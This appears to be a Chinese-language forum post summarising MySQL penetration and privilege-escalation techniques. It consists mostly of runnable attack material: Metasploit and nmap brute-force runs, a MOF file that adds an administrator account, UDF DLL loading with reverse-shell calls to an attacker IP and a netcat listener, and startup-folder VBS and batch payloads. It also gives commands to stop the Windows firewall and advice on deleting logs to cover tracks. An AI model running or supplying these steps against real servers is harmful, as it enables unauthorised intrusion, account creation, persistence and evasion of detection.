mysql数据库渗透及漏洞利用总结

 Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但技术的进步有无止境,思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞利用、提权、Mysql密码破解和获取webshell等进行了详细研究。
 
1.1 mysql信息收集
        1、端口信息收集
mysql默认端口是3306端口,但也有自定义端口针对默认端口扫描主要利用扫描软件进行探测,推荐使用:    
    1. iisputter,直接填写3306端口,IP地址填写单个或者C段地址。
    2. nmap扫描nmap -p 3306 192.168.1.1-254
特定目标的渗透,可能需要对全端口进行扫描,可以使用Nmap对某一个IP地址进行全端口扫描,端口扫描软件还有sfind等DOS下扫描的工具。
  2、版本信息收集
(1)msf查看版本信息auxiliary/scanner/mysql/mysql_version模块,以扫描主机192.168.157.130为例,命令为:
        
        use auxiliary/scanner/mysql/mysql_version
        set rhosts 192.168.157.130
        run
(2)mysql查询版本命令:            SELECT @@version`、`SELECT version();
(3)sqlmap通过注入点扫描确认信息:
        sqlmap.py -u url --dbms mysql
(4)phpmyadmin管理页面登录后查看localhost->变量->服务器变量和设置中的version参数值。
  3、数据库管理信息收集
Mysql管理工具有多种,例如phpmyadmin网站管理,Navicat for MySQL以及MysqlFront等客户端工具。这些工具有的会直接保存配置信息,这些信息包含数据库服务器地址和数据库用户名以及密码,通过嗅探或者破解配置文件可以获取密码等信息。
  4、msf信息收集模块:
(1)mysql哈希值枚举
        use auxiliary/scanner/mysql/mysql_hashdump
        set username root
        set password root
        run
(2)获取相关信息
        use auxiliary/admin/mysql/mysql_enum
        set username root
        set password root
        run
        获取数据库版本,操作系统名称,架构,数据库目录,数据库用户以及密码哈希值。
(3)执行mysql语句,连接成功后可以在msf执行sql语句,跟sqlmap的–sql-shell模块类似。
        use auxiliary/admin/mysql/mysql_sql
(4)将mysql_schem导出到本地 /root/.msf4/loot/文件夹下       
        use auxiliary/scanner/mysql/mysql_schemadump
(5)文件枚举和目录可写信息枚举
        auxiliary/scanner/mysql/mysql_file_enum
        auxiliary/scanner/mysql/mysql_writable_dirs    没有测试成功过,需要定义枚举目录和相关文件,觉得基本没有啥用。
 
1.2 mysql密码获取
        1.2.1暴力破解
Mysql暴力破解主要有几种:
    1.网页在线连接破解
        可以使用burpsuite和phpMyAdmin多线程批量破解工具。 下载: https://portswigger.net/burp/、 http://pan.baidu.com/s/1c1LD6co
    2.msf通过命令行进行暴力破解
        msf破解mysql密码模块auxiliary/scanner/mysql/mysql_login,其参数主要有BLANK_PASSWORDS、BRUTEFORCE_SPEED、DB_ALL_CREDS、DB_ALL_PASS、DB_ALL_USERS、PASSWORD、PASS_FILE、Proxies、RHOSTS、RPORT、STOP_ON_SUCCESS、THREADS、USERNAME、USERPASS_FILE、USER_AS_PASS、USER_FILE、VERBOSE参数。对单一主机仅仅需要设置RHOSTS、RPORT、USERNAME、PASSWORD和PASS_FILE,其它参数根据实际情况进行设置。
        (1)场景A:对内网获取root某一个口令后,扩展渗透
            use auxiliary/scanner/mysql/mysql_login
            set RHOSTS 192.168.157.1-254
            set password root
            set username root
            run
          执行后对192.168.157.1-254进行mysql密码扫描验证。
        (2)场景B:使用密码字典进行扫描           
                use auxiliary/scanner/mysql/mysql_login
                set RHOSTS 192.168.157.1-254
                set pass_file /tmp/password.txt
                set username root
                run
    3.使用nmap扫描并破解密码
        (1)对某一个IP或者IP地址段进行nmap默认密码暴力破解并扫描
            nmap --script=mysql-brute 192.168.157.130
            nmap --script=mysql-brute 192.168.157.1-254
        (2)使用root账号root密码进行mysql密码验证并扫描获取指定IP地址的端口信息以及mysql数据库相关信息
            nmap -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130            (3)检查root空口令
            nmap --script mysql-empty-password 192.168.195.130
    4.使用hscan工具对mysql口令进行扫描,需要设置扫描IP地址段以及数据库口令字典及用户名字典。
 
1.2.2源代码泄露1.网站源代码备份文件
    一些网站源代码文件中会包含数据库连接文件,通过查看这些文件可以获取数据库账号和密码。一般常见的数据库连接文件为config.php、web.config、conn.asp、db.php/asp、jdbc.properties、sysconfig.properties、JBOSS_HOME\docs\examples\jca\XXXX-ds.xml。以前有一款工具挖掘鸡可以自定义网站等名称对zip/rar/tar/tar.gz/gz/sql等后缀文件进行扫描。
2.配置备份文件
    使用ultraedit等编辑文件编辑数据库配置文件后,会留下bak文件。
        1.2.3 文件包含: 本地文件包含漏洞可以包含文件,通过查看文件代码获取数据库配置文件,进而读取数据库用户名和密码。
        1.2.4其他情况: 有些软件会将IP地址、数据库用户名和密码写进程序中,运行程序后,通过cain软件进行嗅探,可以获取数据库密码。另外Mysql客户端管理工具有的管理员会建立连接记录,这些连接记录保存了用户名、密码和连接IP地址或者主机名,通过配置文件或者嗅探可以获取用户名和密码。
 1.3 mysql获取webshell
        1.3.1  phpmyadminroot账号获取webshell
   1. 3.2 sqlmap注入点获取webshell
 
1.4 mysql提权
        1.4.1    mof提权
1.Webshell上传mof文件提权
    MySQL Root权限MOF方法提权是来自国外Kingcope大牛发布的MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit( https://www.exploit-db.com/exploits/23083/),简称mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:
        方法1:运行 MOF 文件指定为命令行参数 Mofcomp.exe 文件。
        方法2:使用 IMofCompiler 接口和 $ CompileFile 方法。
        方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。
    Microsoft 建议您到存储库编译 MOF 文件使用前两种方法。也就是运行 Mofcomp.exe 文件,或使用IMofCompiler::CompileFile方法。第三种方法仅为向后兼容性与早期版本的?WMI提供,并因为此功能可能不会提供在将来的版本后,不应使用。注意使用MOF方法提权的前提是当前Root帐号可以复制文件到%SystemRoot%\System32\Wbem\MOF目录下,否则会失败!
    该漏洞的利用前提条件是必须具备mysql的root权限,在Kingcope公布的0day中公布了一个pl利用脚本。
        perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555
    192.168.2.100为mysql数据库所在服务器,mysql口令为空,反弹到192.168.2.150的5555端口上。
2.生成nullevt.mof文件
    将以下代码保存为nullevt.mof文件:
        #pragma namespace("\\\\.\\root\\subscription")
        instance of __EventFilter as $EventFilter
        {
            EventNamespace = "Root\\Cimv2";
            Name = "filtP2";
            Query = "Select \ From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
            QueryLanguage = "WQL";
        };
        instance of ActiveScriptEventConsumer as $Consumer
        {
            Name = "consPCSV2";
            ScriptingEngine = "JScript";
            ScriptText =
            "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";
        };
        instance of __FilterToConsumerBinding
        {
            Consumer = $Consumer;
            Filter = $EventFilter;
        };
3.通过Mysql查询将文件导入
    执行以下查询语句,将上面生成的nullevt.mof导入到c:\windows\system32\wbem\mof\目录下在windows7中默认是拒绝访问的。导入后系统会自动运行,执行命令。
    
selectload_file('C:\\RECYCLER\\nullevt.mof') into dumpfile
'c:/windows/system32/wbem/mof/nullevt.mof';
 1.4.2    msf直接mof提权
Msf下的exploit/windows/mysql/mysql_mof模块提供了直接Mof提权,不过该漏洞成功跟操作系统权限和Mysql数据库版本有关,执行成功后会直接反弹shell到meterpreter。
使用过程:
    use exploit/windows/mysql/mysql_mof
    set rhost 192.168.157.1 //设置需要提权的远程主机IP地址
    set rport 3306 //设置mysql的远程端口
    set password root //设置mysql数据库root密码
    set username root //设置mysql用户名
    options //查看设置
    run 0
技巧:
    要是能够通过网页连接管理(phpmyadmin),则可以修改host为%并刷新权限后,则可以通过msf等工具远程连接数据库。默认root等账号不允许远程连接,除非管理员或者数据库用户自己设置。
方法1:本地登入mysql,更改?mysql数据库里的?user?表里的?host项,将localhost改为%
    use mysql;
    update user set host = '%' where user = 'root';
    FLUSH PRIVILEGES ;
    select host, user from user;
方法2:直接授权(推荐)
    从任何主机上使用root用户,密码:youpassword(你的root密码)连接到mysql服务器:
        # mysql -u root -proot
        GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;
        FLUSH PRIVILEGES;
    推荐重新增加一个用户,在实际测试过程中发现很多服务器使用root配置了多个地址,修改后可能会影响实际系统的运行。在实际测试过程中因此建议新增一个用户,授权所有权限,而不是直接更改root配置。
 
1.4.3    UDF提权UDF提权是利用MYSQL的自定义函数功能,将MYSQL账号转化为系统system权限,其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数,有root账号密码
Windows下UDF提权对于Windows2008以下服务器比较适用,也即针对Windows2000、Windows2003的成功率较高。
1.UDF提权条件   
    1. Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
    2. Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\system32。
    3. 掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限的其它账号也可以。
    4. 可以将udf.dll写入到相应目录的权限。
2.提权方法        (1)获取数据库版本、数据位置以及插件位置等信息
            select version();//获取数据库版本
            select user();//获取数据库用户
            select @@basedir ;//获取安装目录
            show variables like '%plugins%'; //寻找mysql安装路径
    (2)导出路径
            C:\Winnt\udf.dll Windows 2000
            C:\Windows\udf.dll Windows2003(有的系统被转义,需要改为C:Windowsudf.dll)
        MYSQL 5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数。该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。
        在某些情况下,我们会遇到Can’t open shared library的情况,这时就需要我们把udf.dll导出到lib\plugin目录下才可以,网上大牛发现利用NTFS ADS流来创建文件夹的方法:
            select @@basedir; //查找到mysql的目录
            select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 
            5.1\\lib::$INDEX_ALLOCATION'; //利用NTFS ADS创建lib目录
            select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 
            5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS创建plugin目录
        执行成功以后就会plugin目录,然后再进行导出udf.dll即可。
    (3)创建cmdshell 函数,该函数叫什么名字在后续中则使用该函数进行查询:
        create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’;
    (4)执行命令:
        select sys_eval(‘whoami’);
        一般情况下不会出现创建不成功哦。连不上3389可以先停止windows防火墙和筛选
        select sys_eval(‘net stop policyagent’);
        select sys_eval(‘net stop sharedaccess’);
        udf.dll下常见函数:
            cmdshell 执行cmd;
            downloader 下载者,到网上下载指定文件并保存到指定目录;
            open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
            backshell 反弹Shell;
            ProcessView 枚举系统进程;
            KillProcess 终止指定进程;
            regread 读注册表;
            regwrite 写注册表;
            shut 关机,注销,重启;
            about 说明与帮助函数;
        具体用户示例: 
            select cmdshell('net user iis_user 123!@#abcABC /add');
            select cmdshell('net localgroup administrators iis_user /add');
            select cmdshell('regedit /s d:web3389.reg');
            select cmdshell('netstat -an');
    (5)清除痕迹
        drop function cmdshell;//将函数删除
        删除udf.dll文件以及其它相关入侵文件及日志。
    (6)常见错误
        1290 - The MySQL server is running with the --secure-file-priv option so it cannot 
        execute this statement
        在my.ini或者mysql.cnf文件中注销 (使用#号) 包含secure_file_priv的行(SHOW VARIABLES LIKE “secure_file_priv”)。
            1123 - Can't initialize function 'backshell';
            UDFs are unavailable with the --skip-grant-tables option
        需要将my.ini中的skip-grant-tables选项去掉。
3.webshell下udf提权
    通过集成udf提权的webshell输入数据库用户名及密码以及数据库服务器地址或者IP通过连接后导出进行提权。
4.Mysql提权综合利用工具
    v5est0r 写了一个Mysql提权综合利用工具,详细情况请参考其代码共享网站: https://github.com/v5est0r/Python_FuckMySQL其主要功能有:  
        (1)自动导出你的backdoor和mof文件
        (2)自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权
        (3)导出LPK.dll文件,劫持系统目录提权
        (4)写启动项提权
    UdF自动提权:
        python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf
    LPK劫持提权:
        python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m lpk
    启动项提权:
        python root.py -a 127.0.0.1 -p root -e "ver&whoami" –mst
    例如通过LOAD_FILE来查看Mysql配置文件my.ini,如果其中配置了skip-grant-tables,这无法进行提权
 1.4.4    无法获取webshell提权
1.连接mysql
    (1)mysql.exe -h ip -uroot -p
    (2)phpmyadmin
    (3)Navicat for MySQL
2.查看数据库版本和数据路径
    SELECT VERSION( );
    Select @@datadir;
    5.1以下版本,将dll导入到c:/windows或者c:/windows/system32/
    5.1以上版本 通过以下查询来获取插件路径:
    SHOW VARIABLES WHERE Variable_Name LIKE "%dir";
    show variables like '%plugin%' ;
    select load_file('C:/phpStudy/Apache/conf/httpd.conf')
    select load_file('C:/phpStudy/Apache/conf/vhosts.conf')
    select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf')
    select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf')
    select load_file('d:/phpStudy/Apache/conf/vhosts.conf')
3.修改mysql.txt
    Mysql.txt为udf.dll的二进制文件转成十六进制代码。
    (1)先执行导入ghost表中的内容
        修改以下代码的末尾代码 select backshell(“YourIP”,4444);
    (2)导出文件到某个目录
            select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';
            select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';
            select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';
            select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';
            select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'
            select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';
            select load_file('C:/ProgramData/MySQL/ MySQL Server 5.1/Data/mysql/user.frm');
            select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll'
    (3)查看FUNCTION中是否存在cmdshell和backshell                    存在则删除:
                drop FUNCTION cmdshell;//删除cmdshell
                drop FUNCTION backshell;//删除backshell
            创建backshell:
                CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //创建backshell
            在具备独立主机的服务器上执行监听:
                nc -vv -l -p 44444
            执行查询:
                select backshell("192.192.192.1",44444);//修改192.192.192.1为你的IP和端口
4.获取webshell后添加用户命令
    注意如果不能直接执行,则需要到c:\windows\system32\下执行
        net user antian365 www.xianzhi.aliyun.com /add
        net localgroup administrators antian365
 
1.4.5    sqlmap直连数据库提权Sqlmap直接连接数据库提权,需要有写入权限和root账号及密码,命令如下:
    (1)连接数据库
            sqlmap.py -d "mysql://root:123456@219.115.1.1:3306/mysql" --os-shell
    (2)选择操作系统的架构,32位操作系统选择1,64位选择2.
    (3)自动上传udf或提示os-shell
    (4)执行whomai命令如果获取系统权限,则表示提权成功。         
 
1.4.5    kali linux下的msfudf提权msfconsole
use exploit/windows/mysql/mysql_payload
options
set rhost 192.168.2.1
set rport 3306
set username root
set password 123456
run 0或者exploit
 
msf下udf提权成功率并不高,跟windows操作系统版本,权限和数据库版本有关,特别是secure-file-priv选项,如果有该选项基本不会成功。
=12pt    1.4.6    启动项提权
1.创建表并插入vbs脚本到表中,依次使用以下命令:
    show databases ;
    use test;
    show tables;
    create table a (cmd text);
    insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
    insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ;
    insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );
    select \ from a;
 
2. 导出vbs脚本到启动
    使用以下命令将刚才在a表中创建的vbs脚本导出到启动选项中。            select \ from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单
        \\程序\\启动\\a.vbs";
    导入成功后,系统重新启动时会自动添加密码为“1”且用户名称为“1”的用户到管理员组中。在实际使用过程中该脚本成功执行的几率比较低,有时候会出现不能导出的错误.
    推荐使用以下脚本
        show databases ;
        use test;
        show tables;
        create table b (cmd text);
        insert into b values ("net user Aspnet123545345! /add");
        insert into b values ("net localgroup administrators Aspnet /add");
        insert into b values ("del b.bat");
        select from b into outfile "C:\\Documents and Settings\\All Users\\ 「开始」菜单\\程序\\启动\\b.bat";
    该脚本执行后虽然会闪现Dos窗口,如果有权限导入到启动选项中,则一定会执行成功,在虚拟机中通过MySQL连接器连接并执行以上命令后,在C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录中会有刚才导出的b.bat脚本文件        说明:
        在不同的操作系统中C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录文件名称可能会不同,这个时候就要将其目录换成相应的目录名称即可。例如如果是英文版本操作系统则其插入的代码为:
        select from b into outfile "C:\\Documents and Settings\\All Users\\ Start Menu\\Programs\\Startup\\b.bat";
        Windows 2008 Server的启动目录为:
            C:\\ProgramData\\Microsoft\\Windows \\Start Menu\\Programs\\Startup\\iis.vbs
        其vbs方法可以参考如下写法:
            create table a (cmd text);
            insert into a values ("set wshshell= createobject (""wscript.shell"" ) " );
            insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );
            insert into a values ("b=wshshell.run ("" cmd.exe /c net localgroup Administrators antian365 /add"",0) " );
            select \ from a into outfile "C:\\ProgramData\\Microsoft\\ Windows\\Start Menu\\Programs\\Startup\\iis.vbs";
3.msf下模块exploit/windows/mysql/mysql_start_up提权
    use exploit/windows/mysql/mysql_start_up
    set rhost 192.168.2.1
    set rport 3306
    set username root
    set password 123456
    run
msf下mysql_start_up提权有一定的几率,对英文版系统支持较好。
 
1.5    MSF其他相关漏洞提权
1.Mysql身份认证漏洞及利用(CVE-2012-2122)
    当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。受影响的产品: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞.
    MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23不存在漏洞.
    MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not不存在漏洞.
use auxiliary/scanner/mysql/ mysql_authbypass_hashdump
2.exploit/windows/mysql/mysql_yassl_hello
3.exploit/windows/mysql/scrutinizer_upload_exec
 1.6    mysql密码破解
1.6.1    lcain工具破解密码
使用UltraEdit-32编辑器直接打开user.MYD文件,打开后使用二进制模式进行查看,在root用户后面是一串字符串,选中这些字符串将其复制到记事本中,这些字符串即为用户加密值,例如506D1427F6F61696B4501445C90624897266DAE3。
注意:    
    1. root后面的“”不要复制到字符串中。
    2. 在有些情况下需要往后面看看,否则得到的不是完整的MYSQLSHA1密码,总之其正确的密码位数是40位。
安装cain工具,使用cracker,右键单击“Add tolist”将Mysql Hashes值加入到破解列表中,使用软件中的字典、暴力破解等方式来进行暴力破解。 
1.6.2    网站在线密码破解1. cmd5.com破解。将获取的mysql值放在cmd5.com网站中进行查询,mysql密码一般都是收费的。
2. somd5.com破解。Somd5.com是后面出现的一个免费破解网站,每次破解需要手工选择图形码进行破解,速度快,效果好,只是每次只能破解一个,而且破解一次后需要重新输入验证码
 1.6.3    hashcat破解
hashcat支持很多种破解算法,免费开源软件,官方网站 https://hashcat.net/hashcat/,破解命令:
    hashcat64.exe -m 200myql.hashpass.dict //破解MySQL323类型
    hashcat64.exe -m 300myql.hashpass.dict //破解MySQL4.1/MySQL5类型
 1.6.4    Join the  Ripper  password cracker
John the Ripper下载地址: http://www.openwall.com /john/h/john179w2.zip,John the Ripper除了能够破解linux外,还能破解多种格式的密码。
    
        Echo 81F5E21E35407D884A6CD4A731AEBFB6AF209E1B> hashes.txt
        John –format =mysql-sha1 hashes.txt
        john --list=formats | grep mysql //查看支持mysql密码破解的算法

0 个评论

要回复文章请先登录注册